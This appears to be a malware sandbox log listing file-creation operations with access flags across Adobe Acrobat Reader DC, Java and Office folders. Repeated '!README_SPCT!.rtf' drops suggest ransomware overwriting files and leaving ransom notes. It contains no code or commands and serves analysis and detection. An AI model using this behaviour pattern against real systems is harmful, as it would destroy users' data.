| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-114x114-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\tzdb.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
